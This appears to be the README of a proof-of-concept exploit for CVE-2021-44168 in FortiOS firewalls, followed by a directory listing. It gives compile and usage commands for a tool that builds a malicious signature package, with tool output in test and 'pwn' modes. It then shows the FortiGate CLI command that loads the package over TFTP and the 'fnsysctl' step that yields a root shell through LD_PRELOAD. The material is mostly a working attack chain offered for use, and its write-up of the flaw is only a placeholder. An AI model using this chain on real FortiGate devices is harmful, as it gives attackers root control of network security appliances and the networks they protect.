A download of code without integrity check vulnerability in the "execute restore src-vis" command of FortiOS before 7.0.3.# Exploit for CVE-2021-44168
## Purpose
Exploit CVE-2021-44168 to drop a shell on a Fortigate firewall and enable its access via `LD_PRELOAD` tricks that execute when running some of Fortigate's CLI commands. You get a root shell.
## Use
Compile:
```
gcc -o gen_src-vis_pkg_file gen_src-vis_pkg_file.c -lz
```
Run:
```
% ./gen_src-vis_pkg_file
./gen_src-vis_pkg_file [ -t | -p ] filename.img
-t Generate test package, or
-p Generate pwn package.
filename.img Write to this file.
```
### Test mode
Test mode drops a file called `pwned.txt` to the root of the Fortigate's filesysem. Create a test package like so:
```
% ./gen_src-vis_pkg_file -t test.img
[+] Generaing TEST package
[+] Reading test.tar for insertion into package file test.img
[+] Compressing test.tar (10240 bytes)
[+] Compressed size: 115
[+] Build pkg_header
[+] pkg_header crc32: 0x16a384f1
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data crc32: 0xe097e419
[+] obj_header crc32: 0xabdfc3cb
[+] Write pkg_header + obj_header + obj_data > test.img
[+] All done. So long and thanks for all the fish!
```
### Exploit mode
Exploit mode creates a payload package that drops a shell onto the FortiGate and enables it via `LD_PRELOAD` tricks. To generate the exploit package, run the exploit like so:
```
% ./gen_src-vis_pkg_file -p pwn.img
[+] Generaing EXPLOIT package
[+] Reading pwn.tar for insertion into package file pwn.img
[+] Compressing pwn.tar (16465920 bytes)
[+] Compressed size: 6843825
[+] Build pkg_header
[+] pkg_header crc32: 0xd657d879
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data crc32: 0xf373554b
[+] obj_header crc32: 0x3a7fdcd7
[+] Write pkg_header + obj_header + obj_data > pwn.img
[+] All done. So long and thanks for all the fish!
```
### Using the malicious package to get a root shell
From the FortiGate admin CLI:
```
FortiGate # execute restore src-vis tftp pwn.img 192.168.100.1
This operation will overwrite the current source visibility signatures!
Do you want to continue? (y/n)y
Please wait...
Connect to tftp server 192.168.100.1 ...
######
Get source visibility signatures from tftp server OK.
upd_manual_cid[255]-Updating src-vis plugin
doInstallUpdatePackage[981]-Full obj found for CIDB000
doInstallUpdatePackage[991]-Updating obj CIDB
installUpdateObject[323]-Step 1:Unpack obj 29, Total=1, cur=0
installUpdateObject[352]-Step 2:Prepare temp file for obj 29
installUpdObjRest[637]-Step 5:Backup /etc/cid.tar.gz->/tmp/update.backup
installUpdObjRest[651]-Step 6:Copy new object /tmp/updPiMCON->/etc/cid.tar.gz
installUpdObjRest[731]-Step 7:Validate object
installUpdObjRest[755]-Step 8:Re-initialize using new obj file
installUpdObjRest[767]-Step 9:Delete backup /tmp/update.backup
cid svr 13 req 4
__update_status[1181]-CIDB000 installed successfully
upd_status_save_status[114]-try to save on status file
upd_status_save_status[179]-Wrote status file
upd_manual_cid[284]-Update successful
./../../../../../data2/bfbin/rdate: Cannot create symlink to '/data2/bfbin/busybox'Error exit delayed from previous errorsupd_cfg_extract_unpacked2
upd_cfg_extract_cid_db_version[554]-version=06000000CIDB00000-00000.00000-0101010000
cid could not install sigs: version failed
FortiGate #
```
At this point you'll have a shell that accessible via `LD_PRELOAD` on CLI commands that shell out to Linux. One such way to activate the newly dropped shell:
```
# fnsysctl ls
/ #
/ # export PATH=/data2/bfbin:/bin
/ # uname -a
Linux FortiGate 3.2.16 #2 SMP Thu Mar 28 02:54:46 UTC 2019 x86_64 GNU/Linux
```
## Write-up of the vuln
TBD. Read the code for now.
[4.0K] /data/pocs/b564e99e93eaeb3739d153b3229bd426a60104c3
├── [8.7K] gen_src-vis_pkg_file.c
├── [ 16M] pwn.tar
├── [3.5K] README.md
└── [ 10K] test.tar
0 directories, 4 files